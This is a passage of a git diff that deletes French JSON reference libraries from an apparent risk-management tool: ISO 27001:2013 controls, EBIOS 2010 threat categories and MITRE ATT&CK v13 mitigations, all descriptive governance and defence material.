"A.16.1.5 - R\u00e9ponse aux incidents li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "Les incidents li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre trait\u00e9s conform\u00e9ment aux proc\u00e9dures document\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.6 - Tirer des enseignements des incidents li\u00e9s \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "Les connaissances recueillies suite \u00e0 l\u2019analyse et la r\u00e9solution d\u2019incidents doivent \u00eatre utilis\u00e9es pour r\u00e9duire la probabilit\u00e9 ou l\u2019impact d\u2019incidents ult\u00e9rieurs.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.16.1.7 - Collecte de preuves", - "description": "L\u2019organisation doit d\u00e9finir et appliquer des proc\u00e9dures d\u2019identification, de collecte, d\u2019acquisition et de protection de l\u2019information pouvant servir de preuve.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.1 - Organisation de la continuit\u00e9 de la s\u00e9curit\u00e9 de l\u2019information", - "description": "L\u2019organisation doit d\u00e9terminer ses exigences en mati\u00e8re de s\u00e9curit\u00e9 de l\u2019information et de continuit\u00e9 de management de la s\u00e9curit\u00e9 de l\u2019information dans des situations d\u00e9favorables, comme lors d\u2019une crise ou d\u2019un sinistre\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.2 - Mise en \u0153uvre de la continuit\u00e9 de la s\u00e9curit\u00e9 de l\u2019information", - "description": "L\u2019organisation doit \u00e9tablir, documenter, mettre en \u0153uvre et tenir \u00e0 jour des processus, des proc\u00e9dures et des mesures permettant de fournir le niveau requis de continuit\u00e9 de s\u00e9curit\u00e9 de l\u2019information au cours d\u2019une situation d\u00e9favorable.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.1.3 - V\u00e9rifier, revoir et \u00e9valuer la continuit\u00e9 de la s\u00e9curit\u00e9 de l\u2019information", - "description": "L\u2019organisation doit v\u00e9rifier les mesures de continuit\u00e9 de la s\u00e9curit\u00e9 de l\u2019information mises en \u0153uvre \u00e0 intervalles r\u00e9guliers afin de s\u2019assurer qu\u2019elles sont valables et efficaces dans des situations d\u00e9favorables.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.17.2.1 - Disponibilit\u00e9 des moyens de traitement de l\u2019information", - "description": "Des moyens de traitement de l\u2019information doivent \u00eatre mis en \u0153uvre avec suffisamment de redondances pour r\u00e9pondre aux exigences de disponibilit\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.1 - Identification de la l\u00e9gislation et des exigences contractuelles applicables", - "description": "Toutes les exigences l\u00e9gales, statutaires, r\u00e9glementaires et contractuelles en vigueur, ainsi que l\u2019approche adopt\u00e9e par l\u2019organisation pour satisfaire \u00e0 ces exigences, doivent \u00eatre explicitement d\u00e9finies, document\u00e9es et mises \u00e0 jour pour chaque syst\u00e8me d\u2019information et pour l\u2019organisation elle-m\u00eame.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.2 - Droits de propri\u00e9t\u00e9 intellectuelle", - "description": "Des proc\u00e9dures appropri\u00e9es doivent \u00eatre mises en \u0153uvre pour garantir la conformit\u00e9 avec les exigences l\u00e9gales, r\u00e9glementaires et contractuelles relatives \u00e0 la propri\u00e9t\u00e9 intellectuelle et \u00e0 l\u2019usage des licences de logiciels propri\u00e9taires.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.3 - Protection des enregistrements", - "description": "Les enregistrements doivent \u00eatre prot\u00e9g\u00e9s de la perte, de la destruction, de la falsification, des acc\u00e8s non autoris\u00e9s et des diffusions non autoris\u00e9es, conform\u00e9ment aux exigences l\u00e9gales, r\u00e9glementaires, contractuelles et aux exigences m\u00e9tier.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.4 - Protection de la vie priv\u00e9e et protection des donn\u00e9es \u00e0 caract\u00e8re personnel", - "description": "La protection de la vie priv\u00e9e et la protection des donn\u00e9es \u00e0 caract\u00e8re personnel doivent \u00eatre garanties telles que l\u2019exigent la l\u00e9gislation ou les r\u00e9glementations applicables, et les clauses contractuelles le cas \u00e9ch\u00e9ant.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.1.5 - R\u00e9glementation relative aux mesures cryptographiques", - "description": "Des mesures cryptographiques doivent \u00eatre prises conform\u00e9ment aux accords, l\u00e9gislation et r\u00e9glementations applicables.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.1 - Revue ind\u00e9pendante de la s\u00e9curit\u00e9 de l\u2019information", - "description": "Des revues r\u00e9guli\u00e8res et ind\u00e9pendantes de l\u2019approche retenue par l\u2019organisme pour g\u00e9rer et mettre en \u0153uvre la s\u00e9curit\u00e9 de l\u2019information (\u00e0 savoir le suivi des objectifs de s\u00e9curit\u00e9, les mesures, les politiques, les proc\u00e9dures et les processus relatifs \u00e0 la s\u00e9curit\u00e9 de l\u2019information) doivent \u00eatre effectu\u00e9es \u00e0 intervalles d\u00e9finis ou lorsque des changements importants sont intervenus.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.2 - Conformit\u00e9 avec les politiques et les normes de s\u00e9curit\u00e9", - "description": "Les responsables doivent r\u00e9guli\u00e8rement v\u00e9rifier la conformit\u00e9 du traite- ment de l\u2019information et des proc\u00e9dures dont ils sont charg\u00e9s au regard des politiques, des normes de s\u00e9curit\u00e9 applicables et autres exigences de s\u00e9curit\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.18.2.3 - V\u00e9rification de la conformit\u00e9 technique", - "description": "Les syst\u00e8mes d\u2019information doivent \u00eatre examin\u00e9s r\u00e9guli\u00e8rement quant \u00e0 leur conformit\u00e9 avec les politiques et les normes de s\u00e9curit\u00e9 de l\u2019information de l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/menaces-ebios-2010.json b/library/libraries/menaces-ebios-2010.json deleted file mode 100644 index b0feafb..0000000 --- a/library/libraries/menaces-ebios-2010.json +++ /dev/null @@ -1,281 +0,0 @@ -{ - "locale": "fr", - "name": "menaces-ebios-2010", - "description": "Menaces Ebios-2010", - "format_version": "1.0", - "objects": [ - { - "type": "threat", - "fields": { - "name": "M1. MAT-USG ", - "description": " D\u00e9tournement de l\u2019usage pr\u00e9vu d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M2. MAT-ESP ", - "description": " Espionnage d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M3. MAT-DEP ", - "description": " D\u00e9passement des limites de fonctionnement d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M4. MAT-DET ", - "description": " D\u00e9t\u00e9rioration d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M5. MAT-MOD ", - "description": " Modification d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M6. MAT-PTE ", - "description": " Perte d'un mat\u00e9riel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M7. LOG-USG ", - "description": " D\u00e9tournement de l'usage pr\u00e9vu d'un logiciel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M8. LOG-ESP ", - "description": " Analyse d'un logiciel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M9. LOG-DEP ", - "description": " D\u00e9passement des limites d'un logiciel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M10. LOG-DET ", - "description": " Suppression de tout ou partie d'un logiciel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M11. LOG-MOD ", - "description": " Modification d'un logiciel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M12. LOG-PTE ", - "description": " Disparition d'un logicie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M13. RSX-USG ", - "description": " Attaque du milieu sur un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M14. RSX-ESP ", - "description": " \u00c9coute passive d'un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M15. RSX-DEP ", - "description": " Saturation d'un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M16. RSX-DET ", - "description": " D\u00e9gradation d'un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M17. RSX-MOD ", - "description": " Modification d'un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M18. RSX-PTE ", - "description": " Disparition d'un canal informatique ou de t\u00e9l\u00e9phonie", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M19. PER-USG ", - "description": " Dissipation de l'activit\u00e9 d'une personne", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M20. PER-ESP ", - "description": " Espionnage d'une personne \u00e0 distance", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M21. PER-DEP ", - "description": " Surcharge des capacit\u00e9s d'une personne", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M22. PER-DET ", - "description": " D\u00e9gradation d'une personne", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M23. PER-MOD ", - "description": " Influence sur une personne", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M24. PER-PTE ", - "description": " D\u00e9part d'une personne", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M25. PAP-USG ", - "description": " D\u00e9tournement de l\u2019usage pr\u00e9vu d'un support papier", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M26. PAP-ESP ", - "description": " Espionnage d'un support papier", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M27. PAP-DET ", - "description": " D\u00e9t\u00e9rioration d'un support papier", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M28. PAP-PTE ", - "description": " Perte d'un support papier", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M29. CAN-USG ", - "description": " Manipulation via un canal interpersonnel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M30. CAN-ESP ", - "description": " Espionnage d'un canal interpersonnel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M31. CAN-DEP ", - "description": " Saturation d'un canal interpersonnel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M32. CAN-DET ", - "description": " D\u00e9gradation d'un canal interpersonnel", - "provider": "EBIOS 2010" - } - }, - { - "type": "threat", - "fields": { - "name": "M33. CAN-MOD ", - "description": " Modification d'un canal interpersonnel", - "provider": "EBIOS 2010" - }, - "provider": "EBIOS 2010" - }, - { - "type": "threat", - "fields": { - "name": "M34. CAN-PTE ", - "description": " Disparition d'un canal interpersonnel", - "provider": "EBIOS 2010" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/mitre-mitigations-fr.json b/library/libraries/mitre-mitigations-fr.json deleted file mode 100644 index f47a180..0000000 --- a/library/libraries/mitre-mitigations-fr.json +++ /dev/null @@ -1,353 +0,0 @@ -{ - "name": "MITRE ATT&CK v13 - Fonctions de s\u00e9curit\u00e9", - "description": "Fonctions de s\u00e9curit\u00e9 depuis MITRE ATT&CK v13", - "format_version": "1.0", - "copyright": "\nTerms of Use\nLICENSE\nThe MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK\u00ae for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.\n\"\u00a9 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.\"\nDISCLAIMERS\nMITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.\nALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN \"AS IS\" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n", - "locale": "fr", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "\ufeffM1031 - Pr\u00e9vention des intrusions sur le r\u00e9seau", - "description": "Utilisez des signatures de d\u00e9tection d\u2019intrusion pour bloquer le trafic aux limites du r\u00e9seau.\nhttps://attack.mitre.org/mitigations/M1031\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1016 - Analyse des vuln\u00e9rabilit\u00e9s", - "description": "L\u2019analyse des vuln\u00e9rabilit\u00e9s est utilis\u00e9e pour trouver des vuln\u00e9rabilit\u00e9s logicielles potentiellement exploitables afin de les corriger.\nhttps://attack.mitre.org/mitigations/M1016\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1035 - Limiter l\u2019acc\u00e8s aux ressources sur le r\u00e9seau", - "description": "Emp\u00eacher l\u2019acc\u00e8s aux partages de fichiers, l\u2019acc\u00e8s \u00e0 distance aux syst\u00e8mes, les services inutiles. Les m\u00e9canismes visant \u00e0 limiter l\u2019acc\u00e8s peuvent inclure l\u2019utilisation de concentrateurs de r\u00e9seau, de passerelles RDP, etc.\nhttps://attack.mitre.org/mitigations/M1035\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1029 - Stockage de donn\u00e9es \u00e0 distance", - "description": "Utilisez le journal de s\u00e9curit\u00e9 \u00e0 distance et le stockage de fichiers sensibles o\u00f9 l\u2019acc\u00e8s peut \u00eatre mieux contr\u00f4l\u00e9 pour \u00e9viter l\u2019exposition des donn\u00e9es du journal de d\u00e9tection d\u2019intrusion ou des informations sensibles.\nhttps://attack.mitre.org/mitigations/M1029\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1037 - Filtrer le trafic r\u00e9seau", - "description": "Utilisez des \u00e9quipements r\u00e9seau pour filtrer le trafic entrant ou sortant et effectuer un filtrage bas\u00e9 sur un protocole. Configurez le logiciel sur les points de terminaison pour filtrer le trafic r\u00e9seau.\nhttps://attack.mitre.org/mitigations/M1037\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1021 - Restreindre le contenu Web", - "description": "Restreindre l\u2019utilisation de certains sites Web, bloquer les t\u00e9l\u00e9chargements / pi\u00e8ces jointes, bloquer Javascript, restreindre les extensions de navigateur, etc.\nhttps://attack.mitre.org/mitigations/M1021\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1033 - Limiter l\u2019installation du logiciel", - "description": "Emp\u00eacher les utilisateurs ou les groupes d\u2019installer des logiciels non approuv\u00e9s.\nhttps://attack.mitre.org/mitigations/M1033\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1013 - Conseils aux d\u00e9veloppeurs d\u2019applications", - "description": "Cette att\u00e9nuation d\u00e9crit toute orientation ou formation donn\u00e9e aux d\u00e9veloppeurs d\u2019applications pour \u00e9viter d\u2019introduire des faiblesses de s\u00e9curit\u00e9 dont un adversaire pourrait \u00eatre en mesure de tirer parti.\nhttps://attack.mitre.org/mitigations/M1013\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1034 - Limiter l\u2019installation mat\u00e9rielle", - "description": "Emp\u00eachez les utilisateurs ou les groupes d\u2019installer ou d\u2019utiliser du mat\u00e9riel non approuv\u00e9 sur les syst\u00e8mes, y compris les p\u00e9riph\u00e9riques USB.\nhttps://attack.mitre.org/mitigations/M1034\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1017 - Formation des utilisateurs", - "description": "Formez les utilisateurs \u00e0 \u00eatre conscients des tentatives d\u2019acc\u00e8s ou de manipulation par un adversaire afin de r\u00e9duire le risque de r\u00e9ussite du hame\u00e7onnage, de l\u2019ing\u00e9nierie sociale et d\u2019autres techniques impliquant une interaction de l\u2019utilisateur.\nhttps://attack.mitre.org/mitigations/M1017\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1052 - Contr\u00f4le de compte d\u2019utilisateur", - "description": "Configurez le contr\u00f4le de compte d\u2019utilisateur Windows pour att\u00e9nuer le risque que des adversaires obtiennent un acc\u00e8s \u00e9lev\u00e9 aux processus.\nhttps://attack.mitre.org/mitigations/M1052\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1028 - Configuration du syst\u00e8me d\u2019exploitation", - "description": "Apportez des modifications de configuration li\u00e9es au syst\u00e8me d\u2019exploitation ou \u00e0 une caract\u00e9ristique commune du syst\u00e8me d\u2019exploitation qui entra\u00eenent un renforcement du syst\u00e8me par rapport aux techniques.\nhttps://attack.mitre.org/mitigations/M1028\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1053 - Sauvegarde des donn\u00e9es", - "description": "Prenez et stockez des sauvegardes de donn\u00e9es \u00e0 partir des syst\u00e8mes des utilisateurs finaux et des serveurs critiques. Assurez-vous que les syst\u00e8mes de sauvegarde et de stockage sont renforc\u00e9s et s\u00e9par\u00e9s du r\u00e9seau de l\u2019entreprise afin d\u2019\u00e9viter toute compromission.\nhttps://attack.mitre.org/mitigations/M1053\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1038 - Pr\u00e9vention de l\u2019ex\u00e9cution", - "description": "Bloquer l\u2019ex\u00e9cution du code sur un syst\u00e8me via le contr\u00f4le des applications et/ou le blocage des scripts.\nhttps://attack.mitre.org/mitigations/M1038\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1043 - Protection d\u2019acc\u00e8s aux informations d\u2019identification", - "description": "Utiliser des fonctionnalit\u00e9s pour emp\u00eacher les adversaires d\u2019acc\u00e9der avec succ\u00e8s aux informations d\u2019identification ; y compris le blocage des formes de dumping des informations d\u2019identification.\nhttps://attack.mitre.org/mitigations/M1043\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1045 - Signature de code", - "description": "Appliquez l\u2019int\u00e9grit\u00e9 binaire et applicative avec la v\u00e9rification de signature num\u00e9rique pour emp\u00eacher l\u2019ex\u00e9cution de code non approuv\u00e9.\nhttps://attack.mitre.org/mitigations/M1045\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1039 - Autorisations des variables d\u2019environnement", - "description": "Emp\u00eachez la modification des variables d\u2019environnement par des utilisateurs et des groupes non autoris\u00e9s.\nhttps://attack.mitre.org/mitigations/M1039\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1057 - Protection contre la perte de donn\u00e9es", - "description": "Utilisez une strat\u00e9gie de protection contre la perte de donn\u00e9es (DLP) pour cat\u00e9goriser les donn\u00e9es sensibles, identifier les formats de donn\u00e9es indicatifs des informations personnelles identifiables (PII) et restreindre l\u2019exfiltration de donn\u00e9es sensibles. (Citation : PurpleSec Data Loss Prevention)\nhttps://attack.mitre.org/mitigations/M1057\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1025 - Int\u00e9grit\u00e9 privil\u00e9gi\u00e9e des processus", - "description": "Prot\u00e9gez les processus avec des privil\u00e8ges \u00e9lev\u00e9s qui peuvent \u00eatre utilis\u00e9s pour interagir avec les composants critiques du syst\u00e8me gr\u00e2ce \u00e0 l\u2019utilisation de la lumi\u00e8re de processus prot\u00e9g\u00e9e, des d\u00e9fenses contre l\u2019injection anti-processus ou d\u2019autres mesures d\u2019application de l\u2019int\u00e9grit\u00e9 des processus.\nhttps://attack.mitre.org/mitigations/M1025\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1055 - Ne pas att\u00e9nuer", - "description": "Cette cat\u00e9gorie consiste \u00e0 associer des techniques d\u2019att\u00e9nuation susceptibles d\u2019augmenter le risque de compromission et que, par cons\u00e9quent, l\u2019att\u00e9nuation n\u2019est pas recommand\u00e9e.\nhttps://attack.mitre.org/mitigations/M1055\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1056 - Pr\u00e9-compromis", - "description": "Cette cat\u00e9gorie est utilis\u00e9e pour toutes les activit\u00e9s d\u2019att\u00e9nuation applicables qui s\u2019appliquent aux techniques qui se produisent avant qu\u2019un adversaire n\u2019obtienne l\u2019acc\u00e8s initial, telles que les techniques de reconnaissance et de d\u00e9veloppement des ressources.\nhttps://attack.mitre.org/mitigations/M1056\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1020 - SSL/TLS Inspection", - "description": "Interrompez et inspectez les sessions SSL/TLS pour examiner le trafic Web chiffr\u00e9 \u00e0 la recherche d\u2019activit\u00e9s adverses.\nhttps://attack.mitre.org/mitigations/M1020\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1046 - Int\u00e9grit\u00e9 du d\u00e9marrage", - "description": "Utilisez des m\u00e9thodes s\u00e9curis\u00e9es pour d\u00e9marrer un syst\u00e8me et v\u00e9rifier l\u2019int\u00e9grit\u00e9 du syst\u00e8me d\u2019exploitation et des m\u00e9canismes de chargement.\nhttps://attack.mitre.org/mitigations/M1046\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1030 - Segmentation du r\u00e9seau", - "description": "Concevez des sections du r\u00e9seau pour isoler les syst\u00e8mes, fonctions ou ressources critiques. Utilisez la segmentation physique et logique pour emp\u00eacher l\u2019acc\u00e8s \u00e0 des syst\u00e8mes et des informations potentiellement sensibles. Utilisez une DMZ pour contenir tous les services connect\u00e9s \u00e0 Internet qui ne doivent pas \u00eatre expos\u00e9s \u00e0 partir du r\u00e9seau interne. Configurez des instances de Virtual Private Cloud (VPC) distinctes pour isoler les syst\u00e8mes cloud critiques.\nhttps://attack.mitre.org/mitigations/M1030\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1019 - Programme de renseignements sur les menaces", - "description": "Un programme de renseignements sur les menaces aide une organisation \u00e0 g\u00e9n\u00e9rer ses propres renseignements sur les menaces et \u00e0 suivre les tendances afin d\u2019\u00e9clairer les priorit\u00e9s d\u00e9fensives afin d\u2019att\u00e9nuer les risques.\nhttps://attack.mitre.org/mitigations/M1019\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1027 - Strat\u00e9gies de mot de passe", - "description": "D\u00e9finissez et appliquez des strat\u00e9gies de mot de passe s\u00e9curis\u00e9 pour les comptes.\nhttps://attack.mitre.org/mitigations/M1027\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1040 - Pr\u00e9vention du comportement sur le point de terminaison", - "description": "Utilisez des fonctionnalit\u00e9s pour emp\u00eacher les mod\u00e8les de comportement suspects de se produire sur les syst\u00e8mes de point de terminaison. Cela peut inclure un processus suspect, un fichier, un appel d\u2019API, etc. comportement.\nhttps://attack.mitre.org/mitigations/M1040\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1018 - Gestion des comptes utilisateurs", - "description": "G\u00e9rez la cr\u00e9ation, la modification, l\u2019utilisation et les autorisations associ\u00e9es aux comptes d\u2019utilisateurs.\nhttps://attack.mitre.org/mitigations/M1018\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1022 - Restreindre les autorisations de fichiers et de r\u00e9pertoires", - "description": "Limitez l\u2019acc\u00e8s en d\u00e9finissant des autorisations de r\u00e9pertoire et de fichier qui ne sont pas sp\u00e9cifiques aux utilisateurs ou aux comptes privil\u00e9gi\u00e9s.\nhttps://attack.mitre.org/mitigations/M1022\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1026 - Gestion des comptes privil\u00e9gi\u00e9s", - "description": "G\u00e9rez la cr\u00e9ation, la modification, l\u2019utilisation et les autorisations associ\u00e9es aux comptes privil\u00e9gi\u00e9s, y compris SYSTEM et root.\nhttps://attack.mitre.org/mitigations/M1026\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1024 - Restreindre les autorisations du Registre", - "description": "Limitez la possibilit\u00e9 de modifier certaines ruches ou cl\u00e9s dans le Registre Windows.\nhttps://attack.mitre.org/mitigations/M1024\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1049 - Antivirus/Antimalware", - "description": "Utilisez des signatures ou des heuristiques pour d\u00e9tecter les logiciels malveillants.\nhttps://attack.mitre.org/mitigations/M1049\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1032 - Authentification multifacteur", - "description": "Utiliser deux \u00e9l\u00e9ments de preuve ou plus pour s\u2019authentifier aupr\u00e8s d\u2019un syst\u00e8me; tels que le nom d\u2019utilisateur et le mot de passe en plus d\u2019un jeton provenant d\u2019une carte \u00e0 puce physique ou d\u2019un g\u00e9n\u00e9rateur de jetons.\nhttps://attack.mitre.org/mitigations/M1032\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1054 - Configuration du logiciel", - "description": "Mettre en \u0153uvre des modifications de configuration au logiciel (autre que le syst\u00e8me d\u2019exploitation) pour att\u00e9nuer les risques de s\u00e9curit\u00e9 associ\u00e9s au fonctionnement du logiciel.\nhttps://attack.mitre.org/mitigations/M1054\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1048 - Isolation des applications et bac \u00e0 sable", - "description": "Limitez l\u2019ex\u00e9cution du code \u00e0 un environnement virtuel sur ou en transit vers un syst\u00e8me de point de terminaison.\nhttps://attack.mitre.org/mitigations/M1048\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1047 - Audit", - "description": "Effectuer des audits ou des analyses de syst\u00e8mes, d\u2019autorisations, de logiciels non s\u00e9curis\u00e9s, de configurations non s\u00e9curis\u00e9es, etc. pour identifier les faiblesses potentielles.\nhttps://attack.mitre.org/mitigations/M1047\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1050 - Protection contre les exploits", - "description": "Utilisez des fonctionnalit\u00e9s pour d\u00e9tecter et bloquer les conditions susceptibles d\u2019entra\u00eener ou d\u2019indiquer un exploit logiciel.\nhttps://attack.mitre.org/mitigations/M1050\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1015 - Configuration d\u2019Active Directory", - "description": "Configurer Active Directory pour emp\u00eacher l\u2019utilisation de certaines techniques ; utiliser le filtrage SID, etc.\nhttps://attack.mitre.org/mitigations/M1015\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1051 - Mettre \u00e0 jour le logiciel", - "description": "Effectuez des mises \u00e0 jour logicielles r\u00e9guli\u00e8res pour att\u00e9nuer les risques d\u2019exploitation.\nhttps://attack.mitre.org/mitigations/M1051\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1044 - Restreindre le chargement de la biblioth\u00e8que", - "description": "Emp\u00eachez l\u2019utilisation abusive des m\u00e9canismes de chargement de biblioth\u00e8que dans le syst\u00e8me d\u2019exploitation et les logiciels pour charger du code non fiable en configurant les m\u00e9canismes de chargement de biblioth\u00e8que appropri\u00e9s et en examinant les logiciels potentiellement vuln\u00e9rables.\nhttps://attack.mitre.org/mitigations/M1044\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "security_function", - "fields": { - "name": "M1042 - 